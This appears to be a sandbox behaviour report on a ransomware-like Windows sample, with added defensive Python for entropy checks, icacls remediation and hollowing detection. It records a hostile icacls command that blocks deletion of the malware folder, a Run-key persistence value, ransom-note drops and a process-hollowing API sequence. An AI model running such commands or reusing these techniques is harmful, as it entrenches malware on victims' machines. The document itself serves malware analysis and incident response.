          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Unpacked PE file: 16.2.NZPC0PFaC0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_004A6CC8 push eax; ret 1_2_004A6CE6
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_004080F5 push ecx; ret 1_2_00408108
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_004052BE push ecx; ret 1_2_004052D1
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_00868F05 push ecx; ret 1_2_00868F18
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_00428565 push ecx; ret 5_2_00428578
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 8_2_007E8F05 push ecx; ret 8_2_007E8F18
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Code function: 9_2_00868F05 push ecx; ret 9_2_00868F18
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_00428565 push ecx; ret 10_2_00428578
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_0040FC9D LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer
          Source: initial sample | Static PE information: section name: .text entropy: 7.96151049011
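          Two numbers feed the unpacking verdicts in this block: the .text entropy of 7.96 bits per byte in the line above, and the two section tables printed either side of "vs" under "Detected unpacking (changes PE section rights)". The Python below is an added example, not part of the Joe Sandbox report or of the sample. shannon_entropy() computes the per-section figure (a value that close to 8.0 means compressed or encrypted bytes, which is how a packer stub looks before it writes the real image over its own header), and diff_section_rights() compares the two tables. The 7.2 packing threshold and the two synthetic byte buffers are my assumptions; the section string is copied from the report. For this sample the per-section E/R/W flags are identical on both sides, and the only difference the check finds is the .reloc entry present in one table and absent from the other.

```python
"""Entropy and section-table checks behind the unpacking verdicts above.

Added example for this report, not part of Joe Sandbox. The 7.2 threshold is a
common packer heuristic chosen here, not a value from the report.
"""
import math
from collections import Counter

PACKED_THRESHOLD = 7.2  # heuristic; ordinary compiled x86 .text sits roughly at 6.0-6.8 bits/byte


def shannon_entropy(data):
    """Shannon entropy of a byte string in bits per byte: 0.0 for a constant
    buffer, 8.0 for a uniform one."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_packed(entropy, threshold=PACKED_THRESHOLD):
    """True when a code section's entropy is in the compressed/encrypted range."""
    return entropy >= threshold


def parse_section_rights(spec):
    """'.text:ER;.rdata:R;.data:W;.rsrc:R;' -> {'.text': 'ER', '.rdata': 'R', ...}

    E, R and W are the execute/read/write characteristics the report abbreviates.
    """
    table = {}
    for item in spec.strip().split(";"):
        item = item.strip()
        if not item:
            continue
        name, _, rights = item.rpartition(":")
        table[name] = rights
    return table


def diff_section_rights(report_field):
    """Split a report value of the form '<table A> vs <table B>' and compare.

    Returns (changed, only_in_a, only_in_b): sections whose flags differ between
    the tables, and sections present on only one side (here a .reloc entry).
    """
    left, _, right = report_field.partition(" vs ")
    a, b = parse_section_rights(left), parse_section_rights(right)
    changed = {s: (a[s], b[s]) for s in a.keys() & b.keys() if a[s] != b[s]}
    return changed, sorted(a.keys() - b.keys()), sorted(b.keys() - a.keys())


# Constructed inputs: the section-rights string copied from the report, plus two
# synthetic buffers standing in for a packed and an unpacked .text section.
REPORT_FIELD = (".text:ER;.rdata:R;.data:W;.rsrc:R; vs "
                ".text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;")
PACKED_BYTES = bytes(range(256)) * 16              # uniform distribution: 8.0 bits/byte
PLAIN_BYTES = b"\x55\x8b\xec\x83\xec\x10" * 600    # a repeated x86 prologue: low entropy

if __name__ == "__main__":
    for label, buf in (("packed-like", PACKED_BYTES), ("plain-like", PLAIN_BYTES)):
        e = shannon_entropy(buf)
        print(f"{label}: {e:.3f} bits/byte -> packed={looks_packed(e)}")
    changed, only_a, only_b = diff_section_rights(REPORT_FIELD)
    print("changed flags:", changed or "none")
    print("only in first table:", only_a or "none", "| only in second:", only_b or "none")
```

          Run it against real sections by reading the raw bytes of each section from the PE (any PE parser will do) and passing them to shannon_entropy(); a dropped copy that is byte-identical to the sample, as the .5.dr file is here, will report the same 7.96.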
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | File created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | File created: C:\_readme.txt
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | File created: C:\Users\user\_readme.txt
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00427D6C RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_00427D6C
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96' /deny *S-1-1-0:(OI)(CI)(DE,DC)
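          The icacls command in the line above denies Everyone (S-1-1-0) the DELETE and DELETE_CHILD rights on the drop folder, inherited by its files (OI) and subfolders (CI). Windows evaluates deny entries before allow entries and Everyone covers administrators as well, so nothing can delete the dropped copy until that ACE is removed, which is why the usual cleanup of the folder fails. The Python below is an added example, not the sample's code and not from the report: it decodes a command of this shape using the documented icacls spelling of rights and inheritance flags (the abbreviation tables are mine and cover only common entries) and builds the inverse command a responder runs before removing the folder and the SysHelper Run value. The sample command is copied from the report; the /grant command in the test is constructed.

```python
"""Decode an icacls /deny rule and produce the command that undoes it.

Added example for this report, not part of the sample or of Joe Sandbox.
Abbreviations follow the icacls command syntax; only common entries are listed.
"""
import re

WELL_KNOWN_SIDS = {
    "S-1-1-0": "Everyone",
    "S-1-5-18": "Local System",
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-545": "Users",
}

# Inheritance flags icacls accepts inside an ACE spec.
INHERITANCE = {
    "OI": "object inherit (applies to files in the folder)",
    "CI": "container inherit (applies to subfolders)",
    "IO": "inherit only (not applied to this object itself)",
    "NP": "do not propagate inherit",
    "I": "inherited from parent",
}

# Simple rights (single letters) and specific rights, as icacls spells them.
RIGHTS = {
    "F": "FULL_CONTROL", "M": "MODIFY", "RX": "READ_AND_EXECUTE", "R": "READ",
    "W": "WRITE", "D": "DELETE", "DE": "DELETE", "DC": "DELETE_CHILD",
    "RC": "READ_CONTROL", "WDAC": "WRITE_DAC", "WO": "WRITE_OWNER",
    "S": "SYNCHRONIZE", "RD": "READ_DATA/LIST_DIRECTORY",
    "WD": "WRITE_DATA/ADD_FILE", "AD": "APPEND_DATA/ADD_SUBDIRECTORY",
    "REA": "READ_EA", "WEA": "WRITE_EA", "X": "EXECUTE/TRAVERSE",
    "RA": "READ_ATTRIBUTES", "WA": "WRITE_ATTRIBUTES",
}

CMD_RE = re.compile(
    r"icacls\s+(?:'(?P<q1>[^']+)'|\"(?P<q2>[^\"]+)\"|(?P<bare>\S+))\s+"
    r"/(?P<verb>grant(?::r)?|deny)\s+(?P<spec>\S+)",
    re.IGNORECASE,
)


def parse_icacls(cmd):
    """Describe the first /grant or /deny ACE in an icacls command line."""
    m = CMD_RE.search(cmd)
    if not m:
        raise ValueError("not an icacls grant/deny command")
    path = m.group("q1") or m.group("q2") or m.group("bare")
    # '*S-1-1-0:(OI)(CI)(DE,DC)': a leading '*' marks a raw SID instead of a name.
    principal, _, perms = m.group("spec").partition(":")
    sid = principal[1:] if principal.startswith("*") else None
    inherit, rights = [], []
    for token in re.findall(r"\(([^)]*)\)", perms):
        if token in INHERITANCE:
            inherit.append(token)
        else:
            rights.extend(t for t in token.split(",") if t)
    if "(" not in perms:  # simple form such as Users:F
        rights.append(perms)
    return {
        "path": path,
        "verb": m.group("verb").lower().split(":")[0],
        "principal": WELL_KNOWN_SIDS.get(sid, principal.lstrip("*")),
        "sid": sid,
        "inheritance": [INHERITANCE[f] for f in inherit],
        "rights": [RIGHTS.get(r, r) for r in rights],
    }


def remediation(ace):
    """Inverse command: strip the principal's deny (or grant) ACEs recursively.

    /remove:d drops deny entries for the SID, /t recurses, /c keeps going past
    per-file errors. Needed before 'del' will succeed on the dropped copy.
    """
    flag = "/remove:d" if ace["verb"] == "deny" else "/remove:g"
    who = f"*{ace['sid']}" if ace["sid"] else ace["principal"]
    return f'icacls "{ace["path"]}" {flag} {who} /t /c'


# Constructed input: the command recorded in the process tree above.
SAMPLE_CMD = ("icacls 'C:\\Users\\user\\AppData\\Local\\5d8f6c6f-a1db-4962-b147-3af438dcbf96' "
              "/deny *S-1-1-0:(OI)(CI)(DE,DC)")

if __name__ == "__main__":
    ace = parse_icacls(SAMPLE_CMD)
    print(f"{ace['verb']} {ace['principal']} ({ace['sid']}) on {ace['path']}")
    print("  rights:     ", ", ".join(ace["rights"]))
    print("  inheritance:", "; ".join(ace["inheritance"]))
    print("undo:", remediation(ace))
```

          The deny ACE covers only the two delete rights, so changing the DACL is still permitted: run the undo command from the account that owns the folder or from an elevated prompt, then delete the folder and the HKCU ...\CurrentVersion\Run SysHelper value listed above.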
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_00401178 rdtsc
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_0040E670 _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_0040E670 _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_1_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose
          Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp, NZPC0PFaC0.exe, 00000010.00000002.554664227.000000000078F000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_00403D1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_0040FC9D LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_0041388C CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_00401178 rdtsc
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_00840042 push dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 8_2_007C0042 push dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Code function: 9_2_00840042 push dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_00404C0B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_0040ACAA SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_004038AF _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_00403D1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_00405246 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_004329BB SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_004329BB SetUnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion:

          Injects a PE file into foreign processes
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Memory written: C:\Users\user\Desktop\NZPC0PFaC0.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Memory written: C:\Users\user\Desktop\NZPC0PFaC0.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Memory written: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Memory written: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Memory written: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe base: 400000 value starts with: 4D5A
          Contains functionality to inject code into remote processes
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_00840110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,5_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe'
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Process created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Process created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Process created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
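          The call list reported for 1_2_00840110 (and its 8_2_007C0110 and 9_2_00840110 twins earlier in the report) is the textbook process-hollowing sequence, and the "Memory written" entries show the outcome: an MZ header landing at base 0x400000 of a child that is a fresh copy of the sample itself, which is why parent and child in the process tree share the same path. The Python below is an added example, not part of the Joe Sandbox report or of the sample. It parses report lines of this shape (the function id glued after the call list is dropped) and walks the API order through the hollowing stages, reporting partial sequences separately so a memory patcher or dumper is not flagged as hollowing. The stage table and the Nt*/Zw*/Wow64* alternatives are my assumptions about equivalent APIs; the first two sample lines are copied from the report and the third is constructed.

```python
"""Match sandbox 'Code function' API lists against the process-hollowing pattern.

Added example for this report; not part of the Joe Sandbox output or the
sample. The stage table is my generalisation of the sequence seen here.
"""
import re

# Stages of classic process hollowing, in order. Each stage is satisfied by any
# of the listed APIs (Nt*/Zw*/Wow64* variants are common in real samples).
HOLLOWING_STAGES = (
    ("create child", {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}),
    ("read thread context", {"GetThreadContext", "Wow64GetThreadContext"}),
    ("unmap image", {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    ("allocate in child", {"VirtualAllocEx", "NtAllocateVirtualMemory", "ZwAllocateVirtualMemory"}),
    ("write payload", {"WriteProcessMemory", "NtWriteVirtualMemory", "ZwWriteVirtualMemory"}),
    ("set thread context", {"SetThreadContext", "Wow64SetThreadContext"}),
    ("resume", {"ResumeThread", "NtResumeThread", "ZwResumeThread"}),
)

FUNC_ID = r"\d+_\d+_[0-9A-Fa-f]{8}"
LINE_RE = re.compile(r"Code function:\s*(?P<fid>" + FUNC_ID + r")\s+(?P<apis>[A-Za-z0-9_,]+)")


def parse_code_function(line):
    """Return (function_id, [api, ...]) for a 'Code function' line, else None.

    The report repeats the function id after the call list, sometimes with only
    a comma between them; that trailing id is filtered out of the API list.
    """
    m = LINE_RE.search(line)
    if not m:
        return None
    apis = [a for a in m.group("apis").split(",") if a and not re.fullmatch(FUNC_ID, a)]
    return m.group("fid"), apis


def hollowing_verdict(apis):
    """Walk the call list through HOLLOWING_STAGES in order.

    Returns (matched, stages_reached). A function that writes into a child but
    never repoints and resumes its thread is reported as partial, not flagged.
    """
    stage = 0
    for api in apis:
        if stage < len(HOLLOWING_STAGES) and api in HOLLOWING_STAGES[stage][1]:
            stage += 1
    return stage == len(HOLLOWING_STAGES), stage


def spawns_self(apis):
    """True if the function resolves its own path before creating the child.

    GetModuleFileName* ahead of CreateProcess* is the tell that the hollowed
    child is a copy of the running binary, matching the process tree above.
    """
    seen_own_path = False
    for api in apis:
        if api.startswith("GetModuleFileName"):
            seen_own_path = True
        elif api.startswith("CreateProcess"):
            return seen_own_path
    return False


def scan(lines):
    """Return {function_id: (matched, stages_reached, spawns_self)} per parsable line."""
    out = {}
    for line in lines:
        parsed = parse_code_function(line)
        if parsed is None:
            continue
        fid, apis = parsed
        matched, reached = hollowing_verdict(apis)
        out[fid] = (matched, reached, spawns_self(apis))
    return out


# Constructed input: two lines copied from this report (the hollowing function
# and a process-killing loop) plus a made-up partial sequence for contrast.
SAMPLE_LINES = [
    "Source: C:\\Users\\user\\Desktop\\NZPC0PFaC0.exeCode function: 1_2_00840110 "
    "VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,"
    "ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,"
    "WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,1_2_00840110",
    "Source: C:\\Users\\user\\Desktop\\NZPC0PFaC0.exeCode function: 5_2_00412440 "
    "CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,"
    "Process32NextW,CloseHandle,5_2_00412440",
    # Hypothetical function: writes into a child but never repoints or resumes the thread.
    "Source: example.exeCode function: 9_9_00401000 CreateProcessW,GetThreadContext,"
    "NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,CloseHandle,9_9_00401000",
]

if __name__ == "__main__":
    for fid, (matched, reached, self_copy) in scan(SAMPLE_LINES).items():
        label = "HOLLOWING" if matched else f"partial ({reached}/{len(HOLLOWING_STAGES)})"
        print(f"{fid}: {label}{' (child is own image)' if self_copy else ''}")
```

          Sandbox call lists are extracted per function in the order the calls appear in the code, not as a runtime trace, so a match is a strong lead rather than proof; confirm it against the "Memory written ... value starts with: 4D5A" events, as this report does.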
          Source: NZPC0PFaC0.exe, 00000010.00000002.554965165.0000000001010000.00000002.00020000.sdmp | Binary or memory string: Program Manager
          Source: NZPC0PFaC0.exe, 00000010.00000002.554965165.0000000001010000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: NZPC0PFaC0.exe, 00000010.00000002.554965165.0000000001010000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: NZPC0PFaC0.exe, 00000010.00000002.554965165.0000000001010000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_0040B476 ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,1_2_0040D028
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,1_2_0040D8C2
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,1_2_0040D4CD
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoA,1_2_004064DB
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,1_2_0040CDD0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,1_2_0040D5E4
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_0040D9EA
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_0040D983
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,1_2_00413249
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoA,1_2_0040F650
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,1_2_0041327D
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,1_2_0040D67C
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,1_2_0040DA26
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,1_2_0040D6F0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,1_2_00404748
